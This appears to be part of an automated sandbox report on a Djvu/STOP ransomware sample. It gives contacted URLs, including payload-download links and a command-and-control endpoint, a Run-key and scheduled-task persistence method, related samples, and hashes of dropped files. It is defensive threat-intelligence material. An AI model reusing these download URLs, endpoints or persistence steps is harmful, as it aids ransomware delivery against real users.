                                                    https://api.2ip.ua/c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000006.00000002.1865493833.0000000000D4F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://api.2ip.ua/geo.jsonUc62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000000.00000002.1641882208.0000000000C1A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://zexeq.com/files/1/build3.exe$runW=c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000002.2323940560.000000000088B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: malware
                                                        		unknown
                                                        http://colisumy.com/dl/build2.exec62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000002.2323940560.000000000088B000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2314479894.00000000008E4000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000002.2324133574.00000000008E5000.00000004.00000020.00020000.00000000.sdmptrue
                                                        • URL Reputation: malware
                                                        		unknown
                                                        https://api.2ip.ua/geo.jsonnc62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000006.00000002.1865493833.0000000000D3B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://api.2ip.ua/geo.json2PRc62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000002.2323940560.0000000000848000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://api.2ip.ua/geo.jsonjnuc62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000004.00000002.1800715864.0000000000718000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://api.2ip.ua/geo.json=c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000000.00000002.1641882208.0000000000C1A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://api.2ip.ua/Rootc62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000004.00000002.1800715864.0000000000757000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  http://zexeq.com/raud/get.php?pid=F8AFCDC4E800A3319FFB343E83099637foc62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000003.00000002.2884216333.000000000075E000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  • Avira URL Cloud: malware
                                                                  		unknown
                                                                  http://zexeq.com/raud/get.phpepc62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2314479894.00000000008E4000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000002.2324133574.00000000008E5000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000003.00000002.2884216333.00000000007B7000.00000004.00000020.00020000.00000000.sdmptrue
                                                                  • URL Reputation: malware
                                                                  		unknown
                                                                  https://we.tl/t-OQnsJqCOOlc62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2315011643.00000000032E8000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2314479894.00000000008E4000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000002.2325329106.00000000032E8000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.2315771340.00000000032E8000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000002.2324133574.00000000008E5000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000003.00000002.2884216333.00000000007F7000.00000004.00000020.00020000.00000000.sdmptrue
                                                                  • 0%, Virustotal, Browse
                                                                  • Avira URL Cloud: safe
                                                                  		unknown
                                                                  http://www.youtube.com/c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.1886492156.0000000003780000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    https://api.2ip.ua/geo.jsonp=n.c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000004.00000002.1800715864.0000000000718000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://api.2ip.ua/geo.jsonMc62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000000.00000002.1641882208.0000000000C1A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://www.wikipedia.com/c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.1886413450.0000000003780000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        		unknown
                                                                        https://api.2ip.ua/0c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000002.2323940560.000000000088B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          http://www.live.com/c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.1886096086.0000000003780000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://api.2ip.ua/2c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000006.00000003.1864586284.0000000000D4E000.00000004.00000020.00020000.00000000.sdmp, c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000006.00000002.1865493833.0000000000D4F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://api.2ip.ua/geo.jsonxhZO1c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000006.00000002.1865493833.0000000000CF9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://www.google.com/c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, 00000002.00000003.1886016416.0000000003780000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                  		high

                                                                                  World Map of Contacted IPs

                                                                                  • No. of IPs < 25%
                                                                                  • 25% < No. of IPs < 50%
                                                                                  • 50% < No. of IPs < 75%
                                                                                  • 75% < No. of IPs

                                                                                  Public IPs

                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                  199.59.242.150
                                                                                  		zexeq.comUnited States
                                                                                  		395082BODIS-NJUStrue
                                                                                  104.21.65.24
                                                                                  		api.2ip.uaUnited States
                                                                                  		13335CLOUDFLARENETUSfalse

                                                                                  General Information

                                                                                  Joe Sandbox version:40.0.0 Tourmaline
                                                                                  Analysis ID:1390473
                                                                                  Start date and time:2024-02-12 01:35:05 +01:00
                                                                                  Joe Sandbox product:CloudBasic
                                                                                  Overall analysis duration:0h 9m 9s
                                                                                  Hypervisor based Inspection enabled:false
                                                                                  Report type:full
                                                                                  Cookbook file name:default.jbs
                                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                  Number of analysed new started processes analysed:11
                                                                                  Number of new started drivers analysed:0
                                                                                  Number of existing processes analysed:0
                                                                                  Number of existing drivers analysed:0
                                                                                  Number of injected processes analysed:0
                                                                                  Technologies:
                                                                                  • HCA enabled
                                                                                  • EGA enabled
                                                                                  • AMSI enabled
                                                                                  Analysis Mode:default
                                                                                  Analysis stop reason:Timeout
                                                                                  Sample name:c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                  Detection:MAL
                                                                                  Classification:mal100.rans.spre.troj.evad.winEXE@9/1138@3/2
                                                                                  EGA Information:
                                                                                  • Successful, ratio: 100%
                                                                                  HCA Information:
                                                                                  • Successful, ratio: 99%
                                                                                  • Number of executed functions: 105
                                                                                  • Number of non-executed functions: 218
                                                                                  Cookbook Comments:
                                                                                  • Found application associated with file extension: .exe

                                                                                  Warnings

                                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                  • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                  • Report size getting too big, too many NtCreateFile calls found.
                                                                                  • Report size getting too big, too many NtOpenFile calls found.
                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                  • Report size getting too big, too many NtReadFile calls found.
                                                                                  • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                  • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                  • Report size getting too big, too many NtWriteFile calls found.

                                                                                  Simulations

                                                                                  Behavior and APIs

                                                                                  TimeTypeDescription
                                                                                  00:35:56Task SchedulerRun new task: Time Trigger Task path: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe s>--Task
                                                                                  00:35:58AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run SysHelper "C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe" --AutoStart
                                                                                  00:36:07AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run SysHelper "C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe" --AutoStart
                                                                                  01:36:16API Interceptor1x Sleep call for process: c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe modified

                                                                                  Joe Sandbox View / Context

                                                                                  IPs

                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  199.59.242.150baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeGet hashmaliciousBabuk, DjvuBrowse
                                                                                  • zexeq.com/raud/get.php?pid=F8AFCDC4E800A3319FFB343E83099637
                                                                                  6279e6237524c32988e7128c27a6a44c301ac1d1531ab3abf317b064eba76acd_payload.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                  • potunulit.org/
                                                                                  Ymdtavpqygjrzq_PI.exeGet hashmaliciousFormBook, DBatLoaderBrowse
                                                                                  • www.agritamaperkasaindonesia.com/kmge/
                                                                                  Ibyz5QzGiV.exeGet hashmaliciousLokibotBrowse
                                                                                  • steevya.com/admin/ba/five/fre.php
                                                                                  Factura proforma adjunta.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.yakin-hm.com/nt8e/?Yxo=MZHud9kMxet5T2L8YDs3rsYyxIdNjupHhQJnT0keEq5jiDIySj744ig25LCroVWDpjT4&jR-Xjh=5jHPk
                                                                                  K.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.cetiya-veluvana.com/t75f/?u0=Tl4nDa252FMQpJVNY72qWpuVEFp510CZfqovHxMA7fYk3klFuQo16toWEHSGxtFJGw2O&m4=Wbfx
                                                                                  0001.exeGet hashmaliciousFormBookBrowse
                                                                                  • www.gardzet6.site/rht6/?1bbh=2duHZ8O0&w84PKtm=PA2P7p+1xflJkDULrkdSh717KSKlfthlFefPs9yUelGMDGkwpVE1Edn1X8mpjUbZRLAM
                                                                                  USsJ0oRIYr.docxGet hashmaliciousUnknownBrowse
                                                                                  • updatingnewofficefilefromcloud.mangospot.net/win/document.doc
                                                                                  104.21.65.24amONbBvdCh.exeGet hashmaliciousLummaC, Amadey, Babuk, Djvu, RedLine, SmokeLoader, XmrigBrowse
                                                                                    rR15ofOPl3.exeGet hashmaliciousLummaC, Amadey, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, RedLineBrowse
                                                                                      x5DUhRx3Eq.exeGet hashmaliciousLummaC, Babuk, Djvu, LummaC Stealer, PureLog Stealer, RedLine, SmokeLoaderBrowse
                                                                                        n634pS0ANZ.exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, PureLog Stealer, SmokeLoader, VidarBrowse
                                                                                          L2OyId5r9o.exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, PureLog Stealer, RedLine, SmokeLoaderBrowse
                                                                                            742BWJCCj5.exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, PureLog Stealer, RedLine, SmokeLoaderBrowse
                                                                                              Oa5MQwNPBq.exeGet hashmaliciousLummaC, Babuk, Djvu, PureLog Stealer, RedLine, SmokeLoaderBrowse
                                                                                                file.exeGet hashmaliciousClipboard Hijacker, Djvu, Glupteba, RedLine, SmokeLoader, Stealc, VidarBrowse
                                                                                                  https://www.jt9.us/Get hashmaliciousHTMLPhisherBrowse
                                                                                                    file.exeGet hashmaliciousBabuk, DjvuBrowse

                                                                                                      Domains

                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                      zexeq.combaaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeGet hashmaliciousBabuk, DjvuBrowse
                                                                                                      • 199.59.242.150
                                                                                                      3485f3cbe491a8770a5f05f4cfcd7742a6182fc61a450d2f8d364ca4c0af1c2e_payload.exeGet hashmaliciousBabuk, DjvuBrowse
                                                                                                      • 175.119.10.231
                                                                                                      9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exeGet hashmaliciousBabuk, Djvu, VidarBrowse
                                                                                                      • 175.120.254.9
                                                                                                      UpS8Qm873s.exeGet hashmaliciousBabuk, Djvu, VidarBrowse
                                                                                                      • 175.120.254.9
                                                                                                      g0Zq7nJjus.exeGet hashmaliciousBabuk, Djvu, VidarBrowse
                                                                                                      • 196.188.169.138
                                                                                                      E0tabE4K4r.exeGet hashmaliciousBabuk, Djvu, VidarBrowse
                                                                                                      • 109.175.29.39
                                                                                                      sbvN2ih5AU.exeGet hashmaliciousBabuk, Djvu, VidarBrowse
                                                                                                      • 175.120.254.9
                                                                                                      kOVwcHSfrR.exeGet hashmaliciousBabuk, Djvu, VidarBrowse
                                                                                                      • 186.182.55.44
                                                                                                      file.exeGet hashmaliciousBabuk, DjvuBrowse
                                                                                                      • 180.94.156.61
                                                                                                      file.exeGet hashmaliciousBabuk, DjvuBrowse
                                                                                                      • 211.119.84.111
                                                                                                      api.2ip.uasTsbAmON9u.exeGet hashmaliciousLummaC, Amadey, Babuk, Djvu, RedLine, SmokeLoader, XmrigBrowse
                                                                                                      • 172.67.139.220
                                                                                                      amONbBvdCh.exeGet hashmaliciousLummaC, Amadey, Babuk, Djvu, RedLine, SmokeLoader, XmrigBrowse
                                                                                                      • 104.21.65.24
                                                                                                      rR15ofOPl3.exeGet hashmaliciousLummaC, Amadey, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, RedLineBrowse
                                                                                                      • 104.21.65.24
                                                                                                      KMPrEVaSfH.exeGet hashmaliciousLummaC, Babuk, Djvu, LummaC Stealer, PureLog Stealer, RedLine, SmokeLoaderBrowse
                                                                                                      • 172.67.139.220
                                                                                                      x5DUhRx3Eq.exeGet hashmaliciousLummaC, Babuk, Djvu, LummaC Stealer, PureLog Stealer, RedLine, SmokeLoaderBrowse
                                                                                                      • 104.21.65.24
                                                                                                      n634pS0ANZ.exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, PureLog Stealer, SmokeLoader, VidarBrowse
                                                                                                      • 104.21.65.24
                                                                                                      L2OyId5r9o.exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, PureLog Stealer, RedLine, SmokeLoaderBrowse
                                                                                                      • 104.21.65.24
                                                                                                      742BWJCCj5.exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, PureLog Stealer, RedLine, SmokeLoaderBrowse
                                                                                                      • 104.21.65.24
                                                                                                      38QTCIw4QJ.exeGet hashmaliciousLummaC, Babuk, Djvu, PureLog Stealer, RedLine, SmokeLoader, zgRATBrowse
                                                                                                      • 172.67.139.220
                                                                                                      vqX34PLtA3.exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, PureLog Stealer, RedLine, SmokeLoaderBrowse
                                                                                                      • 172.67.139.220

                                                                                                      ASNs

                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                      CLOUDFLARENETUSGoogle AI Gemini Ultra For PC V1.0.1.msiGet hashmaliciousUnknownBrowse
                                                                                                      • 172.64.41.3
                                                                                                      CraxsRat01#U007eRip.exeGet hashmaliciousLummaCBrowse
                                                                                                      • 104.21.58.31
                                                                                                      file.exeGet hashmaliciousLummaC, RedLineBrowse
                                                                                                      • 104.21.56.44
                                                                                                      SecuriteInfo.com.Python.Muldrop.25.8678.4056.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                      • 162.159.128.233
                                                                                                      SecuriteInfo.com.Trojan.GenericKD.71615099.29032.10591.exeGet hashmaliciousUnknownBrowse
                                                                                                      • 104.26.7.190
                                                                                                      solaris-docs.lnkGet hashmaliciousUnknownBrowse
                                                                                                      • 172.67.149.76
                                                                                                      6PTXqtDGWB.exeGet hashmaliciousLummaCBrowse
                                                                                                      • 172.67.217.100
                                                                                                      msitest2.msiGet hashmaliciousBazar LoaderBrowse
                                                                                                      • 104.21.51.238
                                                                                                      d5JhXds.htmlGet hashmaliciousUnknownBrowse
                                                                                                      • 104.17.24.14
                                                                                                      SecuriteInfo.com.Win32.Malware-gen.30664.8702.exeGet hashmaliciousUnknownBrowse
                                                                                                      • 104.20.67.143
                                                                                                      BODIS-NJUShttp://discord.cc/meuserdd8Get hashmaliciousUnknownBrowse
                                                                                                      • 199.59.243.225
                                                                                                      http://magic4you.nuGet hashmaliciousUnknownBrowse
                                                                                                      • 199.59.243.225
                                                                                                      eu5v2YSyly.exeGet hashmaliciousFormBookBrowse
                                                                                                      • 199.59.243.225
                                                                                                      SecuriteInfo.com.PUA.Tool.Siggen.7628.19911.29490.exeGet hashmaliciousUnknownBrowse
                                                                                                      • 199.59.243.225
                                                                                                      sample.exeGet hashmaliciousUnknownBrowse
                                                                                                      • 199.59.243.225
                                                                                                      http://iyfbodn.com/?dn=roku.tv&pid=9POT3387I&pbsubid=5b078e79-5ba1-4b65-9896-e4ac7e82995c&noads=http%3A%2F%2Fiyfbodn.com%2F%3Fdn%3Droku.tv%26skipskenzo%3DtrueGet hashmaliciousUnknownBrowse
                                                                                                      • 199.59.243.225
                                                                                                      baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exeGet hashmaliciousBabuk, DjvuBrowse
                                                                                                      • 199.59.242.150
                                                                                                      IHAVERSI.exeGet hashmaliciousUpatreBrowse
                                                                                                      • 199.59.243.225
                                                                                                      6279e6237524c32988e7128c27a6a44c301ac1d1531ab3abf317b064eba76acd_payload.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                      • 199.59.242.150
                                                                                                      EpsilonApp.exeGet hashmaliciousUnknownBrowse
                                                                                                      • 199.59.243.225

                                                                                                      JA3 Fingerprints

                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                      37f463bf4616ecd445d4a1937da06e19solaris-docs.lnkGet hashmaliciousUnknownBrowse
                                                                                                      • 104.21.65.24
                                                                                                      msitest2.msiGet hashmaliciousBazar LoaderBrowse
                                                                                                      • 104.21.65.24
                                                                                                      SecuriteInfo.com.Win32.Malware-gen.30664.8702.exeGet hashmaliciousUnknownBrowse
                                                                                                      • 104.21.65.24
                                                                                                      aCGOYqk3Mu.exeGet hashmaliciousVidarBrowse
                                                                                                      • 104.21.65.24
                                                                                                      Version.122.3642.31.jsGet hashmaliciousSocGholishBrowse
                                                                                                      • 104.21.65.24
                                                                                                      T7klbRYI3l.exeGet hashmaliciousUnknownBrowse
                                                                                                      • 104.21.65.24
                                                                                                      sTsbAmON9u.exeGet hashmaliciousLummaC, Amadey, Babuk, Djvu, RedLine, SmokeLoader, XmrigBrowse
                                                                                                      • 104.21.65.24
                                                                                                      amONbBvdCh.exeGet hashmaliciousLummaC, Amadey, Babuk, Djvu, RedLine, SmokeLoader, XmrigBrowse
                                                                                                      • 104.21.65.24
                                                                                                      rR15ofOPl3.exeGet hashmaliciousLummaC, Amadey, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, RedLineBrowse
                                                                                                      • 104.21.65.24
                                                                                                      6nniXDa5J9.exeGet hashmaliciousGuLoaderBrowse
                                                                                                      • 104.21.65.24

                                                                                                      Dropped Files

                                                                                                      No context

                                                                                                      Created / dropped Files

                                                                                                      C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1150976
                                                                                                      Entropy (8bit):6.657221882859457
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24576:ZBUIKn/vwOXGUXAjCymYZiVtElVIBT2roqnTSSxWeT/dRPOO8sWQHUq7:F0dwAYZt6C31WeTVRPOhs7Uq7
                                                                                                      MD5:1AAB5A9252E93871932CD7381693E199
                                                                                                      SHA1:3B1EE795BC70733D1820A48D2EE4E2641B124CE1
                                                                                                      SHA-256:88968C3B8E6E3FCE9E327CB0D92079B88A35962F0503EDC0888D2D9883DE87C6
                                                                                                      SHA-512:F0DF681492502F7986CE469557575DBA532A02AF562D8EB0FCF758274F0A511442CE25DCD68BA9F812D63029FF6051B3C5114A543D156344EF9FA7EAAAA1C6B6
                                                                                                      Malicious:true
                                                                                                      Yara Hits:
                                                                                                      • Rule: JoeSecurity_Djvu, Description: Yara detected Djvu Ransomware, Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, Author: Joe Security
                                                                                                      • Rule: Windows_Ransomware_Stop_1e8d48ff, Description: unknown, Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, Author: unknown
                                                                                                      • Rule: MALWARE_Win_STOP, Description: Detects STOP ransomware, Source: C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe, Author: ditekSHen
                                                                                                      Antivirus:
                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                      • Antivirus: ReversingLabs, Detection: 87%
                                                                                                      • Antivirus: Virustotal, Detection: 79%, Browse
                                                                                                      Reputation:low
                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......(O..l...l...l....7.f......+/..*...h....9.m..../.m...a|..Q...a|7.s...a|.......&.n....8.n....#.M...l.........d...a|3.m....6.m...Richl...........PE..L...7..]............................AA............@..........................p............@....................................T...............................,...`...8............................Z..@............................................text............................... ..`.rdata..............................@..@.data...X........d..................@....rsrc...............................@..@.reloc..,...........................@..B................................................................................................................................................................................................................................................................................

                                                                                                      C:\Users\user\AppData\Local\15a6b383-1056-4ab7-9872-1a77d608b673\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe:Zone.Identifier

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                      Category:modified
                                                                                                      Size (bytes):26
                                                                                                      Entropy (8bit):3.95006375643621
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:ggPYV:rPYV
                                                                                                      MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                      SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                      SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                      SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                      Malicious:false
                                                                                                      Reputation:high, very likely benign file
                                                                                                      Preview:[ZoneTransfer]....ZoneId=0

                                                                                                      C:\Users\user\AppData\Local\1fb2b8ba-1097-4a46-9df3-e5e560b642f9\build3.exe

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1193
                                                                                                      Entropy (8bit):7.8424576170174145
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:BEeGL+z/QujxuQF90UtsG14/irs5m6dUmRG0w7DRKdnudcLLc3+cKhHs1MuxLv6X:2etzDuEV1eirom6drTWEddLcmhs1NxLs
                                                                                                      MD5:03825F79AE81CBF16BE4D3DEC753D98D
                                                                                                      SHA1:A3328F28539EB980FF5C961E8A2E0ED52CD79486
                                                                                                      SHA-256:C18192D3173B524C8F2DC08B418C00F2181527A5500970034517BA9CBEA93D75
                                                                                                      SHA-512:8892CC1E4A650C69BC42A24EBCC1A6F87143DF16D03F400642BEFAB3B84949FED9FA2D0B5145B09863112669C02AC612A69CBE44AC88312FA0BB6FF44BAFF58A
                                                                                                      Malicious:false
                                                                                                      Reputation:low
                                                                                                      Preview:<!doc.+..\Q./q.11..WN..3.%...o.~.JU&.c.V...s.AQD..t........|/.{...j.....~f.8v.9..ZPz.L..R..dj.T.+.|....[Kx&.s.kP..uY.........Y.U..f.V...9S.28T.M,.......@VGK<+......"D.>....+.......!?.=DIQqe6.m.L......!.Z..+..y.d..E..6..,.Sw-{W.}...@Q.*gC.....|w.\O.J.6...D.....-.Ah..g.....].k....p(..W......<1.as. .7..34.......o.......@r>..}....%......j.-...e.2.K5..1..)...)......a...[.OI.t....m....Va...#...;.....uLozU..WN.....%.!..V......ltf[...r._[....,l..z[y...t0&..L.......d..YM..(...dM9.....m(.z.[......(.5..v....s:..[3.:E.{.k8<..I.+..9.s.*..|H.b.&.1p....$.I.0.......K....{D.27$.m<X.|..]..GH..;M.wfA..b%.$.{...".)....SK@....3z..Bu....c~..........J...". ..X......Y...U.DC*.^Y......J....#f...z.`Z.j..'.T.&.Z...........L...v.lv..M9.(.Q.......2f...!.OI.?.Ox...G..iG........fi..?1...w.z#.3....6}...P_.K.#Sr%.{..@....d....n. .....K(cv..B...2...>:O.vv#sZ.hy.Q.......>!.O.#.F.......)Ve)........8..3S:.lQ..&zC....Ig.uK.a*.|.$.hb.d..%...!..0.1.u......DLB.)`....

                                                                                                      C:\Users\user\AppData\Local\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):617
                                                                                                      Entropy (8bit):7.626610951042679
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:koodziGXarzn/6YeowDRWQy2qJUP+qp5PauX2r4jiCPKv6cii9a:vohiGXarzzGRW52qJLqpl2dv6bD
                                                                                                      MD5:89FA25FD1D7426ACA2CE4B19141FEC25
                                                                                                      SHA1:C21BADD57AD9C6E161DECDAA8E8426FF41D90883
                                                                                                      SHA-256:05AE6CFFD559140D73C9EFB00A0B6B0D0E2343E1499B03DD87ACAB6ECBF66D6B
                                                                                                      SHA-512:0B19E256DF29DE21F87F57F40725651C153929BAD5908CA913CB309F715E1612981BDAAF159701D5D5319F8EFFDAC58302AC856D5349BB06FEF33E951A305540
                                                                                                      Malicious:false
                                                                                                      Reputation:low
